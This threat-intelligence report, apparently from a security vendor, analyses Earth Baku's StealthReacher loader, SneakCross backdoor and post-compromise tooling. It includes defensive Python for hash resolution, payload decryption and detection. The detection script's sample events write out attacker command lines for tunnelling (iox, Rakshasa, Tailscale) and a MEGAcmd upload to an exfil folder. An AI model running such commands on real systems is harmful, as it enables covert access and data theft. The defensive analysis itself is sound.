Exploring Earth Baku's Latest Campaign

A Dive into Earth Baku’s Latest Campaign

Also known as DodgeBox, StealthReacher is an upgraded version of StealthVector that uses code obfuscation techniques such as FNV-1a hashing, among others, to evade defenses. Unlike the older StealthVector, it uses AES for encryption and MD5 hashing for its checksum. Based on our investigation, StealthReacher is the designated loader that launches the group's latest modular backdoor, SneakCross.
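Loaders that hash API names (FNV-1a is a common choice) store only the hash constants, so an analyst has to rebuild the mapping from hashes back to export names. The resolver below is an added example, not code from the original report or from Earth Baku's tooling; it assumes plain 32-bit FNV-1a over the ASCII export name with no case folding or trailing NUL, and the candidate export list is constructed for the demo.

```python
"""FNV-1a hash resolver for analysing API-hashing loaders.

Added example (not from the original report). Assumption: the loader hashes
exported function names with standard 32-bit FNV-1a over the ASCII name.
If the real sample folds case or hashes a NUL-terminated string, adjust
`fnv1a32` to match its routine before trusting the resolved names.
"""

FNV32_OFFSET = 0x811C9DC5
FNV32_PRIME = 0x01000193


def fnv1a32(data: bytes) -> int:
    """Standard 32-bit FNV-1a: XOR the byte in, then multiply by the prime."""
    h = FNV32_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV32_PRIME) & 0xFFFFFFFF
    return h


def build_hash_table(names, hasher=fnv1a32):
    """Map hash -> name for every candidate export name."""
    return {hasher(n.encode("ascii")): n for n in names}


def resolve_hashes(unknown, table):
    """Return {hash: name-or-None} for constants lifted from a sample."""
    return {h: table.get(h) for h in unknown}


# Constructed candidate list. In practice this would be the export tables of
# kernel32.dll, ntdll.dll, etc. dumped from a clean Windows install.
CANDIDATE_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateFileW", "WriteFile", "ConvertThreadToFiber", "CreateFiber",
]

if __name__ == "__main__":
    table = build_hash_table(CANDIDATE_EXPORTS)
    # Constructed "unknown" constants, as an analyst might lift them from a
    # disassembled hash-comparison routine.
    lifted = [fnv1a32(b"VirtualAlloc"), fnv1a32(b"CreateFiber"), 0xDEADBEEF]
    for h, name in resolve_hashes(lifted, table).items():
        print(f"0x{h:08x} -> {name or '<unresolved>'}")
```

The table is rebuilt per DLL export list, so an unresolved hash usually means either a DLL missing from the candidate set or a variant hash (case folding, different offset basis) that the first assumption did not cover.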

It is noteworthy that both StealthVector and StealthReacher re-encrypt themselves after the first launch, using XOR with the victim's computer name as the key. From a digital forensics standpoint, this makes decrypting and analysing the collected payload significantly harder, even when all modules (loader and payload) are acquired together.
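Because the re-encryption key is the victim's computer name, a responder who has the host name (from the imaged machine, DHCP leases or Active Directory computer objects) can recover the payload offline. The snippet below is an added example, not code from the original report; the report states only that XOR is used with the computer name as key, so the ASCII, repeating, upper-cased key handling and the minimal PE plausibility check are assumptions to adjust against the real sample. The host names and payload are constructed.

```python
"""Recovering an XOR-re-encrypted loader/payload from a known host name.

Added example (not from the original report). Assumptions: the key is the
host name as Windows reports it (uppercase ASCII), applied as a repeating
XOR key over the whole file.
"""
import itertools


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR `data` against a repeating `key`; XOR is symmetric, so this both
    encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))


def decrypt_with_hostname(blob: bytes, hostname: str) -> bytes:
    # Assumption: the key is the upper-cased host name, as GetComputerName
    # returns it.
    return xor_with_key(blob, hostname.upper().encode("ascii"))


def looks_like_pe(data: bytes) -> bool:
    """Cheap plausibility check: a decrypted PE starts with 'MZ' and has a
    'PE\\0\\0' signature at the offset stored at 0x3C."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_off = int.from_bytes(data[0x3C:0x40], "little")
    return data[pe_off:pe_off + 4] == b"PE\x00\x00"


def find_hostname(blob: bytes, candidates):
    """Try each candidate host name and return the first one that yields a
    plausible PE, or None if none does."""
    for name in candidates:
        if looks_like_pe(decrypt_with_hostname(blob, name)):
            return name
    return None


def make_sample_pe() -> bytes:
    """Constructed minimal PE-like image for the demo (headers only)."""
    hdr = bytearray(0x100)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x80).to_bytes(4, "little")
    hdr[0x80:0x84] = b"PE\x00\x00"
    return bytes(hdr) + b"\x90" * 64

if __name__ == "__main__":
    victim = "WS-FINANCE-07"                                  # constructed
    encrypted = decrypt_with_hostname(make_sample_pe(), victim)  # symmetric
    hit = find_hostname(encrypted, ["DC01", "WS-HR-02", victim])
    print("key recovered:", hit)
```

The practical point for collection is that the loader and payload alone are not enough: the computer name must be recorded alongside them (and the exact form the sample uses, including case, confirmed in the decryption routine), otherwise the artefacts cannot be decrypted later.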

SneakCross, the group's latest modular backdoor, uses Google services for its command-and-control (C&C) communication and Windows Fibers to evade detection by network protection tools and EDR solutions. We believe it succeeds the group's earlier modular backdoor, ScrambleCross, which we covered in our previous analysis. The modular design lets the threat actors easily upgrade functionality, change behaviour, and tailor operations to different scenarios.

In its disclosure, Google Cloud reported identifying at least 15 plugins supporting various backdoor operations, including:

  • Shell Actions
  • File System Actions
  • Process Actions
  • Network Scanning
  • Network Store Interface Actions
  • Screen Actions
  • System Information Discovery
  • File Manipulation Actions
  • Keylogger
  • Active Directory Actions
  • File Uploader
  • RDP
  • DNS Actions
  • DNS Cache Actions
  • Registry Actions

Post-Infiltration Procedure

In the post-infiltration phase, Earth Baku uses a range of tools in the victim's environment for persistence, privilege escalation, discovery, and data exfiltration. This section covers the most notable of these tools.

Persistence: reverse tunnels

The threat actors made notable efforts to build reverse tunnels with the following tools to maintain continuous access to compromised systems:

Custom iox tool

The actors built a customized iox tunneling tool from publicly available source code. Their modifications include simplified mandatory arguments (local IP/port) and an additional unique argument, -ggg. The tool only runs correctly when this argument is supplied.

Rakshasa

Rakshasa is a robust proxy tool written in Go, designed specifically for multi-level proxying and intranet penetration.

Tailscale

Tailscale is a Virtual Private Network (VPN) service designed to establish secure connectivity among devices within a single virtual network. We recently observed the threat actors attempting to add compromised systems to their own virtual networks using Tailscale. They also use legitimate Tailscale servers as intermediaries, which makes tracing the origin of their activity considerably harder.

Data Extraction

In the victim's environment, numerous instances of the MEGAcmd tool were found on the infected machines. This command-line tool interacts with the MEGA cloud storage service. We infer that the threat actors intended to use it to transfer stolen data to MEGA, taking advantage of its efficiency at uploading large volumes of data. A similar tactic was observed with an affiliated group, Earth Lusca.
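The tooling in this section (the customized iox build gated on -ggg, Rakshasa, Tailscale joining hosts to an attacker tailnet, and MEGAcmd uploads) leaves process-creation telemetry that can be triaged with simple command-line rules. The script below is an added example, not code from the original report. The events are constructed, the pipe-separated field layout stands in for whatever your EDR or Sysmon event 1 pipeline emits, and the file names and arguments used for Rakshasa, Tailscale and MEGAcmd are assumptions to tune against your own telemetry; only the -ggg gate argument comes from the report.

```python
"""Process-creation triage for the post-compromise tooling described above.

Added example (not from the original report). Event layout, tool file names
and the sample command lines are constructed; the `-ggg` argument is the one
detail taken from the report.
"""
import re
from collections import namedtuple

Event = namedtuple("Event", "ts host user image cmdline")
Finding = namedtuple("Finding", "rule host user cmdline")

# Each rule: name, regex over the full command line, short description.
RULES = [
    ("custom_iox_gate",
     re.compile(r"(^|\s)-ggg(\s|$)"),
     "custom iox build only runs when the -ggg argument is present"),
    ("rakshasa_proxy",
     re.compile(r"rakshasa", re.I),
     "Rakshasa multi-level proxy (assumed file name)"),
    ("tailscale_unapproved",
     re.compile(r"tailscale(d)?(\.exe)?\b.*\b(up|login)\b", re.I),
     "Tailscale joining the host to a tailnet on a host where it is not sanctioned"),
    ("megacmd_upload",
     re.compile(r"mega(cmd|-put|-login)", re.I),
     "MEGAcmd client (assumed command names), possible exfiltration to MEGA"),
]

APPROVED_TAILSCALE_HOSTS = set()   # hosts where Tailscale is sanctioned


def parse_event(line: str) -> Event:
    return Event(*[f.strip() for f in line.split("|", 4)])


def triage(lines, approved_tailscale=APPROVED_TAILSCALE_HOSTS):
    """Return a Finding for every rule that matches an event's command line."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        for name, rx, _desc in RULES:
            if not rx.search(ev.cmdline):
                continue
            if name == "tailscale_unapproved" and ev.host in approved_tailscale:
                continue
            findings.append(Finding(name, ev.host, ev.user, ev.cmdline))
    return findings


# Constructed sample events: timestamp|host|user|image|command line
SAMPLE_EVENTS = """\
2024-06-03T02:11:09Z|WS-FINANCE-07|CORP\\svc_iis|C:\\Windows\\Temp\\svchost.exe|svchost.exe 10.20.30.40 443 -ggg
2024-06-03T02:12:44Z|WS-FINANCE-07|CORP\\svc_iis|C:\\Windows\\Temp\\rakshasa.exe|rakshasa.exe 10.20.30.40:8443
2024-06-03T02:15:01Z|WS-FINANCE-07|CORP\\svc_iis|C:\\Program Files\\Tailscale\\tailscale.exe|tailscale.exe up --authkey tskey-REDACTED
2024-06-03T03:02:17Z|WS-FINANCE-07|CORP\\svc_iis|C:\\Users\\Public\\MEGAcmd\\mega-put.exe|mega-put.exe C:\\Users\\Public\\out.7z /exfil
2024-06-03T08:30:00Z|WS-HR-02|CORP\\jdoe|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\notes.txt
""".splitlines()

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host} {f.user}: {f.cmdline}")
```

The Tailscale rule is the one that needs an allow-list: the binary is legitimate, so the signal is a host joining a tailnet where the organisation has not sanctioned it, not the presence of the tool itself.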

Trace Elimination

Our examination found that Earth Baku deliberately tampered with their StealthVector loader by erasing the first 1000 bytes of the file. This lets the threat actor evade security products: at the time of writing, the tampered file had far fewer detections on VirusTotal than the original version, which numerous security vendors identified. The strategy, intended to make investigating the tools harder, is more often seen in ransomware attacks and is uncommon in APT attacks. It illustrates the skill and care Earth Baku brings to its operations.
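A file with its first 1000 bytes erased no longer carries the DOS and PE headers that header-based signatures key on, but the code and data after the headers are intact, including any plaintext import names. The triage heuristic below is an added example, not code from the original report: it flags a blob that lacks the MZ/PE magic yet still contains several Windows DLL or API name strings. That indicator set is an assumption chosen for this example, not a documented Earth Baku signature, and the sample file is constructed; the example models the erasure as removal of the leading bytes, which the report does not specify.

```python
"""Triage heuristic for a PE file whose first 1000 bytes were erased.

Added example (not from the original report). Assumptions: the erased bytes
are removed from the file, and surviving import-name strings are a usable
hint that the blob is a headerless PE body.
"""
import re

STRIPPED_BYTES = 1000   # figure from the report
IMPORT_HINTS = re.compile(
    rb"(kernel32\.dll|ntdll\.dll|advapi32\.dll|ws2_32\.dll|"
    rb"LoadLibrary[AW]|GetProcAddress|VirtualAlloc|VirtualProtect)", re.I)


def has_pe_header(data: bytes) -> bool:
    """True if the blob starts with 'MZ' and the e_lfanew offset points at
    a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    off = int.from_bytes(data[0x3C:0x40], "little")
    return data[off:off + 4] == b"PE\x00\x00"


def headerless_pe_indicators(data: bytes) -> dict:
    """Report why a blob looks like a PE body without its header."""
    hints = sorted({m.group(0).lower() for m in IMPORT_HINTS.finditer(data)})
    leading_nul = len(data) - len(data.lstrip(b"\x00"))
    return {
        "has_pe_header": has_pe_header(data),
        "import_hints": [h.decode() for h in hints],
        "leading_nul_bytes": leading_nul,
        # Heuristic threshold: no header plus at least two import-name hints.
        "suspect_headerless_pe": not has_pe_header(data) and len(hints) >= 2,
    }


def make_sample_pe() -> bytes:
    """Constructed stand-in for a loader: valid headers, then a body whose
    .rdata-like region holds import names."""
    hdr = bytearray(0x400)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x80).to_bytes(4, "little")
    hdr[0x80:0x84] = b"PE\x00\x00"
    body = b"\x90" * 0x200 + b"kernel32.dll\x00LoadLibraryA\x00VirtualAlloc\x00"
    return bytes(hdr) + body


def strip_header(data: bytes, n: int = STRIPPED_BYTES) -> bytes:
    """Model the tampering: drop the first n bytes of the file."""
    return data[n:]

if __name__ == "__main__":
    original = make_sample_pe()
    tampered = strip_header(original)
    for label, blob in (("original", original), ("tampered", tampered)):
        print(label, headerless_pe_indicators(blob))
```

Such a file cannot be executed as-is, so a hit means the sample is a staged or retired artefact rather than a live binary; the value for the investigation is that it can still be tied to a known family by the strings and code that survived, instead of being discarded as corrupt data.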

Summary

Since late 2022, Earth Baku has significantly broadened its operations from the Indo-Pacific region to encompass Europe and MEA. Recent operations showcase sophisticated tactics, using public-facing applications like IIS servers for initial entry and deploying the Godzilla webshell for control. The group has introduced new loaders such as StealthVector and StealthReacher to discreetly launch backdoor components, with SneakCross as their latest modular backdoor. Additionally, Earth Baku uses various tools during post-infiltration operations: a customized iox tool, Rakshasa and Tailscale for persistence, and MEGAcmd for efficient data exfiltration. These developments underline Earth Baku's evolving and increasingly advanced threat profile, presenting formidable challenges to cybersecurity defenses.

To safeguard against cyberespionage strategies and mitigate the risk of compromise, both individual users and organizations should adopt the following recommended practices:

  • Enforcing the principle of least privilege: Limiting access to sensitive data and closely monitoring user permissions make it harder for attackers to move laterally through a corporate network.
  • Rectifying security loopholes: Periodic updates of systems and applications, alongside stringent adherence to patch management policies, enable organizations to rectify security vulnerabilities within their ecosystem. Furthermore, deploying virtual patching can safeguard legacy systems lacking available patches.
  • Crafting a proactive incident response plan: Implementing defensive measures oriented towards identifying and countering threats following a breach, coupled with regular security exercises, enhances the efficacy of an organization’s incident response blueprint.
  • Embracing the 3-2-1 backup protocol: Maintaining a minimum of three data copies in two diverse formats, with one stored off-site in an air-gapped manner, ensures data integrity even in the event of a successful breach. Routine updates and testing of these backups bolster data security.

Organizations seeking to fortify their defenses against sophisticated attacks can explore robust security technologies like Trend Vision One™. This solution empowers security teams to consistently identify attack surfaces, encompassing known and unknown, managed and unmanaged cyber assets.

It supports organizations in evaluating and addressing potential risks and vulnerabilities by assessing critical factors such as attack likelihood and impact, delivering a comprehensive suite of prevention, detection, and response capabilities, all fortified by advanced threat research, intelligence, and AI. Vision One enhances an organization’s overall security posture and efficacy, providing robust defense against diverse types of attacks.

The indicators of compromise for this investigation can be accessed here.
